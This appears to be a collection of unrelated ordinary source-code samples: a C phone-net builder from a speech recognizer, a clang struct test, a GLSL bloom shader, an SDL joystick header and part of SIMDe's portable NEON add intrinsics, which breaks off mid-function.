    if (! wn->pred) {
	/* No predecessor, pick SILENCE_CIPHONE as left context */
	lc[mdef->sil] = 1;
    } else {
	for (gn = wn->pred; gn; gn = gn->next) {
	    wl = (wlink_t *) gnode_ptr(gn);
	    wid = wl->dst->wid;		/* Predecessor word id */
	    lc[dict_last_phone(dict, wid)] = 1;
	}
    }
    if (! wn->succ) {
	/* No successor, use SILENCE_CIPHONE as right context */
	rc[mdef->sil] = 1;
    } else {
	for (gn = wn->succ; gn; gn = gn->next) {
	    wl = (wlink_t *) gnode_ptr(gn);
	    wid = wl->dst->wid;
	    rc[dict_first_phone(dict, wid)] = 1;
	}
    }

    /* Per-context entry/exit pnode lists, filled in below. */
    wnode_data->lc = (glist_t *) ckd_calloc (mdef->n_ciphone, sizeof(glist_t));
    wnode_data->rc = (glist_t *) ckd_calloc (mdef->n_ciphone, sizeof(glist_t));

    /* Create phone net for wn->wid */
    wid = wn->wid;
    if ((pronlen = dict_pronlen (dict, wid)) > 1) {
	/* Multi-phone pronunciation; initial phone position, expand left contexts */
	p1list = NULL;	/* List of distinct HMMs allocated for leftmost phone */
	ci = dict_pron(dict, wid, 0);
	r = dict_pron(dict, wid, 1);
	for (i = 0; i < mdef->n_ciphone; i++) {
	    if (! lc[i])
		continue;

	    pid = mdef_phone_id_nearest (mdef, ci, (s3cipid_t)i, r, WORD_POSN_BEGIN);
	    assert (IS_PID(pid));
	    /* Share one pnode among contexts that map to the same HMM. */
	    if ((pn = plist_lookup_hmm (mdef, p1list, pid)) == NULL) {
		pn = pnode_create (mdef, pid, wid, 0);
		p1list = glist_add_ptr (p1list, (void *) pn);
	    }
	    wnode_data->lc[i] = glist_add_ptr (wnode_data->lc[i], (void *) pn);
	}

	/* Intermediate phones; known left/right contexts */
	for (i = 1; i < pronlen-1; i++) {
	    p2list = NULL;

	    /* Create HMM node for phone position i */
	    ci = dict_pron (dict, wid, i);
	    l = dict_pron (dict, wid, i-1);
	    r = dict_pron (dict, wid, i+1);
	    pid = mdef_phone_id_nearest (mdef, ci, l, r, WORD_POSN_INTERNAL);
	    assert (IS_PID(pid));
	    pn = pnode_create (mdef, pid, wid, i);
	    p2list = glist_add_ptr (p2list, (void *) pn);

	    /* Link from previous nodes */
	    for (gn = p1list; gn; gn = gn->next) {
		prevpn = (pnode_t *) gnode_ptr(gn);
		link_pnodes (prevpn, pn);
	    }
	    glist_free (p1list);
	    p1list = p2list;
	}

	/* Final phone position; expand right context (for the ones present) */
	p2list = NULL;
	ci = dict_pron(dict, wid, pronlen-1);
	l = dict_pron(dict, wid, pronlen-2);
	for (i = 0; i < mdef->n_ciphone; i++) {
	    if (! rc[i])
		continue;

	    pid = mdef_phone_id_nearest (mdef, ci, l, (s3cipid_t)i, WORD_POSN_END);
	    assert (IS_PID(pid));
	    if ((pn = plist_lookup_hmm (mdef, p2list, pid)) == NULL) {
		pn = pnode_create (mdef, pid, wid, pronlen-1);
		p2list = glist_add_ptr (p2list, (void *) pn);
	    }
	    wnode_data->rc[i] = glist_add_ptr (wnode_data->rc[i], (void *) pn);
	}

	/* Link from previous nodes */
	for (gn = p1list; gn; gn = gn->next) {
	    prevpn = (pnode_t *) gnode_ptr(gn);
	    for (gn2 = p2list; gn2; gn2 = gn2->next) {
		pn = (pnode_t *) gnode_ptr(gn2);
		link_pnodes (prevpn, pn);
	    }
	}
	glist_free (p1list);
	glist_free (p2list);
    } else {
	/* Single-phone word; handle left/right contexts simultaneously */
	p1list = NULL;
	ci = dict_pron(dict, wid, 0);
	for (i = 0; i < mdef->n_ciphone; i++) {
	    if (! lc[i])
		continue;
	    for (j = 0; j < mdef->n_ciphone; j++) {
		if (! rc[j])
		    continue;

		pid = mdef_phone_id_nearest (mdef, ci, (s3cipid_t)i, (s3cipid_t)j, WORD_POSN_SINGLE);
		assert (IS_PID(pid));
		if ((pn = plist_lookup_hmm (mdef, p1list, pid)) == NULL) {
		    pn = pnode_create (mdef, pid, wid, 0);
		    p1list = glist_add_ptr (p1list, (void *) pn);
		}
		wnode_data->lc[i] = glist_add_ptr (wnode_data->lc[i], (void *) pn);
		wnode_data->rc[j] = glist_add_ptr (wnode_data->rc[j], (void *) pn);
	    }
	}
	glist_free (p1list);
    }

    ckd_free (lc);
    ckd_free (rc);
}

/*
 * Build cross-word HMM links, taking phonetic context into account:
 * Let the last CIphone in src = l (i.e., the left context for dst), and
 * the first CIphone in dst = r (i.e., the right phonetic context for src).  Then,
 * create links from the HMMs in the glist src->rc[r] to those in dst->lc[l].  But,
 * avoid creating duplicate links, since several entries in a glist may share the
 * same HMM.
 */
static void link_wnodes (dict_t *dict, wnode_data_t *src, wnode_data_t *dst)
{
    s3cipid_t l, r;
    wnode_t *wn;
    gnode_t *gn1, *gn2;
    pnode_t *pn1, *pn2;

    /* Find the last phone for the source node (the left context for the destination) */
    wn = src->wnode;
    l = dict_pron (dict, wn->wid, dict_pronlen(dict, wn->wid) - 1);

    /* Find the first phone for the dest. node (the right context for the source) */
    wn = dst->wnode;
    r = dict_pron (dict, wn->wid, 0);

    /* Link each HMM in src->rc[r] to each in dst->lc[l] */
    for (gn1 = src->rc[r]; gn1; gn1 = gn1->next) {
	pn1 = (pnode_t *) gnode_ptr(gn1);
	for (gn2 = dst->lc[l]; gn2; gn2 = gn2->next) {
	    pn2 = (pnode_t *) gnode_ptr(gn2);

	    /* Check if a link already exists */
	    if (! plink_lookup (pn1, pn2))
		link_pnodes (pn1, pn2);
	}
    }
}

/*
 * Convert a wordnet into a phone net.  Returns the global pnet list;
 * *pstart/*pend receive dummy silence pnodes anchoring the net.
 */
glist_t wnet2pnet (mdef_t *mdef, dict_t *dict, glist_t wnet,
		   wnode_t *wstart, wnode_t *wend,	/* In: Dummy start/end anchors */
		   pnode_t **pstart, pnode_t **pend)	/* Out: Dummy start/end anchors */
{
    gnode_t *gn, *gn2;
    wnode_t *wn;
    wlink_t *wl;
    int32 n, i, j;
    wnode_data_t *wnode_data;
    pnode_t *pn, *pn2;

    if (NOT_CIPID(mdef->sil))
	E_FATAL("%s not defined\n", SILENCE_CIPHONE);

    pnet = NULL;
    n_pnode = 0;
    n_plink = 0;

    /* Allocate wnode_data_t prior to building the phone net */
    n = glist_count (wnet) - 2;		/* Skip wstart and wend */
    if (n <= 0) {
	E_ERROR("Empty word net\n");
	return NULL;
    }
    wnode_data = (wnode_data_t *) ckd_calloc (n, sizeof(wnode_data_t));
    for (gn = wnet, i = 0; gn; gn = gn->next) {
	wn = (wnode_t *) gnode_ptr(gn);
	if ((wn == wstart) || (wn == wend))
	    continue;		/* Skip the dummy start/end nodes */

	wn->data = i;		/* Remember this node's wnode_data[] index */
	wnode_data[i].wnode = wn;
	wnode2pnet_build (mdef, dict, wnode_data+i);
	i++;
    }
    assert (i == n);

    /* Create links between the pnodes created for each word above */
    for (i = 0; i < n; i++) {
	wn = wnode_data[i].wnode;
	for (gn = wn->succ; gn; gn = gn->next) {
	    wl = (wlink_t *) gnode_ptr(gn);
	    if ((wnode_t *)wl->dst != wend)
		link_wnodes (dict, wnode_data+i, wnode_data+(wl->dst->data));
	}
    }

    /* Add dummy pnode at the beginning of the net */
    pn = pnode_create (mdef, mdef->sil, BAD_WID, 0);

    /* Link it to initial phones of all successors of wstart */
    for (gn = wstart->succ; gn; gn = gn->next) {
	wl = (wlink_t *) gnode_ptr(gn);
	i = wl->dst->data;

	for (j = 0; j < mdef->n_ciphone; j++) {
	    for (gn2 = wnode_data[i].lc[j]; gn2; gn2 = gn2->next) {
		pn2 = (pnode_t *) gnode_ptr(gn2);
		if (! plink_lookup (pn, pn2))
		    link_pnodes (pn, pn2);
	    }
	}
    }
    *pstart = pn;

    /* Add dummy pnode at the end of the net */
    pn = pnode_create (mdef, mdef->sil, BAD_WID, 0);

    /* Link from the final phones of all predecessors of wend to pn */
    for (gn = wend->pred; gn; gn = gn->next) {
	wl = (wlink_t *) gnode_ptr(gn);
	i = wl->dst->data;

	for (j = 0; j < mdef->n_ciphone; j++) {
	    for (gn2 = wnode_data[i].rc[j]; gn2; gn2 = gn2->next) {
		pn2 = (pnode_t *) gnode_ptr(gn2);
		if (! plink_lookup (pn2, pn))
		    link_pnodes (pn2, pn);
	    }
	}
    }
    *pend = pn;

    /* Free working data */
    for (i = 0; i < n; i++) {
	for (j = 0; j < mdef->n_ciphone; j++) {
	    glist_free (wnode_data[i].lc[j]);
	    glist_free (wnode_data[i].rc[j]);
	}
	ckd_free (wnode_data[i].lc);
	ckd_free (wnode_data[i].rc);
    }
    ckd_free (wnode_data);

    E_INFO("%d pnodes, %d plinks\n", n_pnode, n_plink);

    return pnet;
}

/* glist_apply_ptr callback: release one pnode's HMM states and links. */
static void pnode_free (void *data)
{
    pnode_t *pn;

    pn = (pnode_t *) data;
    ckd_free (pn->hmm.state);
    glist_myfree (pn->succ, sizeof(plink_t));
}

/* Free an entire phone net previously returned by wnet2pnet(). */
void pnet_free (glist_t pnet)
{
    glist_apply_ptr (pnet, pnode_free);
    glist_myfree (pnet, sizeof(pnode_t));
}

/* Mark in `active' the senones used by every pnode in plist. */
void pnet_set_senactive (mdef_t *m, glist_t plist, bitvec_t active, int32 n_sen)
{
    gnode_t *gn;
    pnode_t *pn;

    bitvec_clear_all (active, n_sen);
    for (gn = plist; gn; gn = gnode_next(gn)) {
	pn = (pnode_t *) gnode_ptr(gn);
	senone_set_active (active, m->phone[pn->hmm.pid].state, m->n_emit_state);
    }
}

/* Used only by the following dump routines */
static mdef_t *tmpmdef;
static dict_t *tmpdict;

/* Print one pnode as word.position.phone (or <> for dummy anchors). */
static void pnet_dump_pnode (void *data)
{
    pnode_t *pn;
    char buf[4096];

    pn = (pnode_t *) data;
    mdef_phone_str (tmpmdef, pn->hmm.pid, buf);
    if (IS_WID(pn->wid))
	printf ("%s.%d.%s\n", dict_wordstr(tmpdict, pn->wid), pn->pos, buf);
    else
	printf ("%s.%d.%s\n", "<>", pn->pos, buf);	/* Dummy node */
    fflush (stdout);
}

/* Print a pnode followed by each of its successor links. */
static void pnet_dump_plink (void *data)
{
    pnode_t *pn;
    plink_t *pl;
    gnode_t *gn;

    pnet_dump_pnode (data);

    pn = (pnode_t *) data;
    for (gn = pn->succ; gn; gn = gn->next) {
	pl = (plink_t *) gnode_ptr(gn);
	printf ("\t\t-> ");
	pnet_dump_pnode (pl->dst);
    }
    fflush (stdout);
}

/* Debug dump of the full phone net (nodes first, then links). */
void pnet_dump (mdef_t *m, dict_t *d, glist_t pnet)
{
    tmpdict = d;
    tmpmdef = m;

    E_INFO("pnodes:\n");
    glist_apply_ptr (pnet, pnet_dump_pnode);
    E_INFO("plinks:\n");
    glist_apply_ptr (pnet, pnet_dump_plink);
}
{ "language": "C" }
// RUN: %clang_cc1 -emit-llvm %s -o - #ifdef PACKED #define P __attribute__((packed)) #else #define P #endif struct P M_Packed { unsigned int l_Packed; unsigned short k_Packed : 6, i_Packed : 15, j_Packed : 11; }; struct M_Packed sM_Packed; int testM_Packed (void) { struct M_Packed x; return (x.i_Packed != 0); }
{ "language": "C" }
precision lowp float;
precision lowp int;

#define INSERTION

// Bloom composite pass: adds up to five blurred mip textures onto the scene,
// then applies exponential tone mapping and gamma correction.
uniform sampler2D sceneTexture;
uniform float bloomStrength;
uniform float exposure;
uniform float gamma;
uniform float bloomFactors[5];
uniform vec3 bloomTintColors[5];
#ifdef BLUR_STEP_1_ACTIVE
uniform sampler2D blurTexture1;
#endif
#ifdef BLUR_STEP_2_ACTIVE
uniform sampler2D blurTexture2;
#endif
#ifdef BLUR_STEP_3_ACTIVE
uniform sampler2D blurTexture3;
#endif
#ifdef BLUR_STEP_4_ACTIVE
uniform sampler2D blurTexture4;
#endif
#ifdef BLUR_STEP_5_ACTIVE
uniform sampler2D blurTexture5;
#endif
#ifdef BLEND_WITH_SKYBOX
uniform sampler2D skyboxColorTexture;
#endif
varying vec2 vUV;

void main(){
  #ifdef BLEND_WITH_SKYBOX
  // Tint every bloom level with the skybox colour instead of the uniforms.
  // NOTE(review): lookup at -vUV mirrors the UV — assumed intentional, confirm.
  vec3 skyboxColor = texture2D(skyboxColorTexture, -vUV).rgb;
  vec3 tintColor0 = skyboxColor;
  vec3 tintColor1 = skyboxColor;
  vec3 tintColor2 = skyboxColor;
  vec3 tintColor3 = skyboxColor;
  vec3 tintColor4 = skyboxColor;
  #else
  vec3 tintColor0 = bloomTintColors[0];
  vec3 tintColor1 = bloomTintColors[1];
  vec3 tintColor2 = bloomTintColors[2];
  vec3 tintColor3 = bloomTintColors[3];
  vec3 tintColor4 = bloomTintColors[4];
  #endif

  vec4 hdrColor = texture2D(sceneTexture, vUV);

  // Accumulate each enabled blur level, scaled by its factor and tint.
  #ifdef BLUR_STEP_1_ACTIVE
  hdrColor = hdrColor + (bloomStrength * bloomFactors[0] * vec4(tintColor0.rgb, 1.0) * texture2D(blurTexture1, vUV));
  #endif
  #ifdef BLUR_STEP_2_ACTIVE
  hdrColor = hdrColor + (bloomStrength * bloomFactors[1] * vec4(tintColor1.rgb, 1.0) * texture2D(blurTexture2, vUV));
  #endif
  #ifdef BLUR_STEP_3_ACTIVE
  hdrColor = hdrColor + (bloomStrength * bloomFactors[2] * vec4(tintColor2.rgb, 1.0) * texture2D(blurTexture3, vUV));
  #endif
  #ifdef BLUR_STEP_4_ACTIVE
  hdrColor = hdrColor + (bloomStrength * bloomFactors[3] * vec4(tintColor3.rgb, 1.0) * texture2D(blurTexture4, vUV));
  #endif
  #ifdef BLUR_STEP_5_ACTIVE
  hdrColor = hdrColor + (bloomStrength * bloomFactors[4] * vec4(tintColor4.rgb, 1.0) * texture2D(blurTexture5, vUV));
  #endif

  // Exponential (Reinhard-style) exposure tone mapping, then gamma encode.
  vec3 toneMappedColor = vec3(1.0) - exp(-hdrColor.rgb * exposure);
  toneMappedColor = pow(toneMappedColor, vec3(1.0 / gamma));
  gl_FragColor = vec4(toneMappedColor.rgb, hdrColor.a);
}
{ "language": "C" }
/* Simple DirectMedia Layer Copyright (C) 1997-2018 Sam Lantinga <slouken@libsdl.org> This software is provided 'as-is', without any express or implied warranty. In no event will the authors be held liable for any damages arising from the use of this software. Permission is granted to anyone to use this software for any purpose, including commercial applications, and to alter it and redistribute it freely, subject to the following restrictions: 1. The origin of this software must not be misrepresented; you must not claim that you wrote the original software. If you use this software in a product, an acknowledgment in the product documentation would be appreciated but is not required. 2. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software. 3. This notice may not be removed or altered from any source distribution. */ #include <linux/input.h> struct SDL_joylist_item; /* The private structure used to keep track of a joystick */ struct joystick_hwdata { int fd; struct SDL_joylist_item *item; SDL_JoystickGUID guid; char *fname; /* Used in haptic subsystem */ /* The current Linux joystick driver maps hats to two axes */ struct hwdata_hat { int axis[2]; } *hats; /* The current Linux joystick driver maps balls to two axes */ struct hwdata_ball { int axis[2]; } *balls; /* Support for the Linux 2.4 unified input interface */ Uint8 key_map[KEY_MAX]; Uint8 abs_map[ABS_MAX]; struct axis_correct { int used; int coef[3]; } abs_correct[ABS_MAX]; int fresh; /* Steam Controller support */ SDL_bool m_bSteamController; }; /* vi: set ts=4 sw=4 expandtab: */
{ "language": "C" }
/* SPDX-License-Identifier: MIT
 *
 * Permission is hereby granted, free of charge, to any person
 * obtaining a copy of this software and associated documentation
 * files (the "Software"), to deal in the Software without
 * restriction, including without limitation the rights to use, copy,
 * modify, merge, publish, distribute, sublicense, and/or sell copies
 * of the Software, and to permit persons to whom the Software is
 * furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be
 * included in all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
 * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
 * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
 * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
 * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
 * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
 * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
 * SOFTWARE.
 *
 * Copyright:
 *   2020 Evan Nemerson <evan@nemerson.com>
 */

/* Portable implementations of the ARM NEON vadd/vaddq intrinsic family.
 *
 * Every function below follows the same shape: use the native NEON
 * intrinsic when compiling for ARM, otherwise fall back to another SIMD
 * ISA (MMX/SSE/AltiVec/WASM) where one exists for that element type, and
 * finally to a portable element-wise loop (or GCC vector-extension add
 * when SIMDE_VECTOR_SUBSCRIPT_OPS is available).  The *_ENABLE_NATIVE_ALIASES
 * blocks let callers keep using the bare NEON names (e.g. vadd_f32). */

#if !defined(SIMDE_ARM_NEON_ADD_H)
#define SIMDE_ARM_NEON_ADD_H

#include "types.h"

HEDLEY_DIAGNOSTIC_PUSH
SIMDE_DISABLE_UNWANTED_DIAGNOSTICS
SIMDE_BEGIN_DECLS_

/* vadd_f32: element-wise add of two 64-bit vectors of 2 x float32. */
SIMDE_FUNCTION_ATTRIBUTES
simde_float32x2_t
simde_vadd_f32(simde_float32x2_t a, simde_float32x2_t b) {
  #if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
    return vadd_f32(a, b);
  #else
    simde_float32x2_private
      r_,
      a_ = simde_float32x2_to_private(a),
      b_ = simde_float32x2_to_private(b);
    #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
      r_.values = a_.values + b_.values;
    #else
      SIMDE_VECTORIZE
      for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) {
        r_.values[i] = a_.values[i] + b_.values[i];
      }
    #endif
    return simde_float32x2_from_private(r_);
  #endif
}
#if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES)
  #undef vadd_f32
  #define vadd_f32(a, b) simde_vadd_f32((a), (b))
#endif

/* vadd_f64: element-wise add of 1 x float64 (AArch64-only intrinsic). */
SIMDE_FUNCTION_ATTRIBUTES
simde_float64x1_t
simde_vadd_f64(simde_float64x1_t a, simde_float64x1_t b) {
  #if defined(SIMDE_ARM_NEON_A64V8_NATIVE)
    return vadd_f64(a, b);
  #else
    simde_float64x1_private
      r_,
      a_ = simde_float64x1_to_private(a),
      b_ = simde_float64x1_to_private(b);
    #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
      r_.values = a_.values + b_.values;
    #else
      SIMDE_VECTORIZE
      for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) {
        r_.values[i] = a_.values[i] + b_.values[i];
      }
    #endif
    return simde_float64x1_from_private(r_);
  #endif
}
#if defined(SIMDE_ARM_NEON_A64V8_ENABLE_NATIVE_ALIASES)
  #undef vadd_f64
  #define vadd_f64(a, b) simde_vadd_f64((a), (b))
#endif

/* vadd_s8: element-wise add of 8 x int8; MMX fallback on x86. */
SIMDE_FUNCTION_ATTRIBUTES
simde_int8x8_t
simde_vadd_s8(simde_int8x8_t a, simde_int8x8_t b) {
  #if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
    return vadd_s8(a, b);
  #elif defined(SIMDE_X86_MMX_NATIVE)
    return _mm_add_pi8(a, b);
  #else
    simde_int8x8_private
      r_,
      a_ = simde_int8x8_to_private(a),
      b_ = simde_int8x8_to_private(b);
    #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
      r_.values = a_.values + b_.values;
    #else
      SIMDE_VECTORIZE
      for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) {
        r_.values[i] = a_.values[i] + b_.values[i];
      }
    #endif
    return simde_int8x8_from_private(r_);
  #endif
}
#if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES)
  #undef vadd_s8
  #define vadd_s8(a, b) simde_vadd_s8((a), (b))
#endif

/* vadd_s16: element-wise add of 4 x int16; MMX fallback on x86. */
SIMDE_FUNCTION_ATTRIBUTES
simde_int16x4_t
simde_vadd_s16(simde_int16x4_t a, simde_int16x4_t b) {
  #if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
    return vadd_s16(a, b);
  #elif defined(SIMDE_X86_MMX_NATIVE)
    return _mm_add_pi16(a, b);
  #else
    simde_int16x4_private
      r_,
      a_ = simde_int16x4_to_private(a),
      b_ = simde_int16x4_to_private(b);
    #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
      r_.values = a_.values + b_.values;
    #else
      SIMDE_VECTORIZE
      for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) {
        r_.values[i] = a_.values[i] + b_.values[i];
      }
    #endif
    return simde_int16x4_from_private(r_);
  #endif
}
#if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES)
  #undef vadd_s16
  #define vadd_s16(a, b) simde_vadd_s16((a), (b))
#endif

/* vadd_s32: element-wise add of 2 x int32; MMX fallback on x86. */
SIMDE_FUNCTION_ATTRIBUTES
simde_int32x2_t
simde_vadd_s32(simde_int32x2_t a, simde_int32x2_t b) {
  #if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
    return vadd_s32(a, b);
  #elif defined(SIMDE_X86_MMX_NATIVE)
    return _mm_add_pi32(a, b);
  #else
    simde_int32x2_private
      r_,
      a_ = simde_int32x2_to_private(a),
      b_ = simde_int32x2_to_private(b);
    #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
      r_.values = a_.values + b_.values;
    #else
      SIMDE_VECTORIZE
      for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) {
        r_.values[i] = a_.values[i] + b_.values[i];
      }
    #endif
    return simde_int32x2_from_private(r_);
  #endif
}
#if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES)
  #undef vadd_s32
  #define vadd_s32(a, b) simde_vadd_s32((a), (b))
#endif

/* vadd_s64: element-wise add of 1 x int64 (no MMX 64-bit add; loop fallback). */
SIMDE_FUNCTION_ATTRIBUTES
simde_int64x1_t
simde_vadd_s64(simde_int64x1_t a, simde_int64x1_t b) {
  #if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
    return vadd_s64(a, b);
  #else
    simde_int64x1_private
      r_,
      a_ = simde_int64x1_to_private(a),
      b_ = simde_int64x1_to_private(b);
    #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
      r_.values = a_.values + b_.values;
    #else
      SIMDE_VECTORIZE
      for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) {
        r_.values[i] = a_.values[i] + b_.values[i];
      }
    #endif
    return simde_int64x1_from_private(r_);
  #endif
}
#if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES)
  #undef vadd_s64
  #define vadd_s64(a, b) simde_vadd_s64((a), (b))
#endif

/* vadd_u8: element-wise add of 8 x uint8 (unsigned add wraps; same bits as signed). */
SIMDE_FUNCTION_ATTRIBUTES
simde_uint8x8_t
simde_vadd_u8(simde_uint8x8_t a, simde_uint8x8_t b) {
  #if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
    return vadd_u8(a, b);
  #else
    simde_uint8x8_private
      r_,
      a_ = simde_uint8x8_to_private(a),
      b_ = simde_uint8x8_to_private(b);
    #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
      r_.values = a_.values + b_.values;
    #else
      SIMDE_VECTORIZE
      for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) {
        r_.values[i] = a_.values[i] + b_.values[i];
      }
    #endif
    return simde_uint8x8_from_private(r_);
  #endif
}
#if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES)
  #undef vadd_u8
  #define vadd_u8(a, b) simde_vadd_u8((a), (b))
#endif

/* vadd_u16: element-wise add of 4 x uint16. */
SIMDE_FUNCTION_ATTRIBUTES
simde_uint16x4_t
simde_vadd_u16(simde_uint16x4_t a, simde_uint16x4_t b) {
  #if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
    return vadd_u16(a, b);
  #else
    simde_uint16x4_private
      r_,
      a_ = simde_uint16x4_to_private(a),
      b_ = simde_uint16x4_to_private(b);
    #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
      r_.values = a_.values + b_.values;
    #else
      SIMDE_VECTORIZE
      for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) {
        r_.values[i] = a_.values[i] + b_.values[i];
      }
    #endif
    return simde_uint16x4_from_private(r_);
  #endif
}
#if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES)
  #undef vadd_u16
  #define vadd_u16(a, b) simde_vadd_u16((a), (b))
#endif

/* vadd_u32: element-wise add of 2 x uint32. */
SIMDE_FUNCTION_ATTRIBUTES
simde_uint32x2_t
simde_vadd_u32(simde_uint32x2_t a, simde_uint32x2_t b) {
  #if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
    return vadd_u32(a, b);
  #else
    simde_uint32x2_private
      r_,
      a_ = simde_uint32x2_to_private(a),
      b_ = simde_uint32x2_to_private(b);
    #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
      r_.values = a_.values + b_.values;
    #else
      SIMDE_VECTORIZE
      for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) {
        r_.values[i] = a_.values[i] + b_.values[i];
      }
    #endif
    return simde_uint32x2_from_private(r_);
  #endif
}
#if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES)
  #undef vadd_u32
  #define vadd_u32(a, b) simde_vadd_u32((a), (b))
#endif

/* vadd_u64: element-wise add of 1 x uint64. */
SIMDE_FUNCTION_ATTRIBUTES
simde_uint64x1_t
simde_vadd_u64(simde_uint64x1_t a, simde_uint64x1_t b) {
  #if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
    return vadd_u64(a, b);
  #else
    simde_uint64x1_private
      r_,
      a_ = simde_uint64x1_to_private(a),
      b_ = simde_uint64x1_to_private(b);
    #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
      r_.values = a_.values + b_.values;
    #else
      SIMDE_VECTORIZE
      for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) {
        r_.values[i] = a_.values[i] + b_.values[i];
      }
    #endif
    return simde_uint64x1_from_private(r_);
  #endif
}
#if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES)
  #undef vadd_u64
  #define vadd_u64(a, b) simde_vadd_u64((a), (b))
#endif

/* vaddq_f32: 128-bit add of 4 x float32; SSE/AltiVec/WASM fallbacks. */
SIMDE_FUNCTION_ATTRIBUTES
simde_float32x4_t
simde_vaddq_f32(simde_float32x4_t a, simde_float32x4_t b) {
  #if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
    return vaddq_f32(a, b);
  #elif defined(SIMDE_X86_SSE_NATIVE)
    return _mm_add_ps(a, b);
  #elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
    /* Copy through AltiVec vector temporaries before vec_add. */
    SIMDE_POWER_ALTIVEC_VECTOR(float) a_ , b_, r_;
    a_ = a;
    b_ = b;
    r_ = vec_add(a_, b_);
    return r_;
  #elif defined(SIMDE_WASM_SIMD128_NATIVE)
    return wasm_f32x4_add(a, b);
  #else
    simde_float32x4_private
      r_,
      a_ = simde_float32x4_to_private(a),
      b_ = simde_float32x4_to_private(b);
    #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
      r_.values = a_.values + b_.values;
    #else
      SIMDE_VECTORIZE
      for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) {
        r_.values[i] = a_.values[i] + b_.values[i];
      }
    #endif
    return simde_float32x4_from_private(r_);
  #endif
}
#if defined(SIMDE_ARM_NEON_A32V7_ENABLE_NATIVE_ALIASES)
  #undef vaddq_f32
  #define vaddq_f32(a, b) simde_vaddq_f32((a), (b))
#endif

/* vaddq_f64: 128-bit add of 2 x float64 (AArch64-only intrinsic). */
SIMDE_FUNCTION_ATTRIBUTES
simde_float64x2_t
simde_vaddq_f64(simde_float64x2_t a, simde_float64x2_t b) {
  #if defined(SIMDE_ARM_NEON_A64V8_NATIVE)
    return vaddq_f64(a, b);
  #elif defined(SIMDE_X86_SSE2_NATIVE)
    return _mm_add_pd(a, b);
  #elif defined(SIMDE_POWER_ALTIVEC_P7_NATIVE)
    return vec_add(a, b);
  #elif defined(SIMDE_WASM_SIMD128_NATIVE)
    return wasm_f64x2_add(a, b);
  #else
    simde_float64x2_private
      r_,
      a_ = simde_float64x2_to_private(a),
      b_ = simde_float64x2_to_private(b);
    #if defined(SIMDE_VECTOR_SUBSCRIPT_OPS)
      r_.values = a_.values + b_.values;
    #else
      SIMDE_VECTORIZE
      for (size_t i = 0 ; i < (sizeof(r_.values) / sizeof(r_.values[0])) ; i++) {
        r_.values[i] = a_.values[i] + b_.values[i];
      }
    #endif
    return simde_float64x2_from_private(r_);
  #endif
}
#if defined(SIMDE_ARM_NEON_A64V8_ENABLE_NATIVE_ALIASES)
  #undef vaddq_f64
  #define vaddq_f64(a, b) simde_vaddq_f64((a), (b))
#endif

/* vaddq_s8: 128-bit add of 16 x int8. */
SIMDE_FUNCTION_ATTRIBUTES
simde_int8x16_t
simde_vaddq_s8(simde_int8x16_t a, simde_int8x16_t b) {
  #if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
    return vaddq_s8(a, b);
  #elif defined(SIMDE_X86_SSE2_NATIVE)
    return _mm_add_epi8(a, b);
  #elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
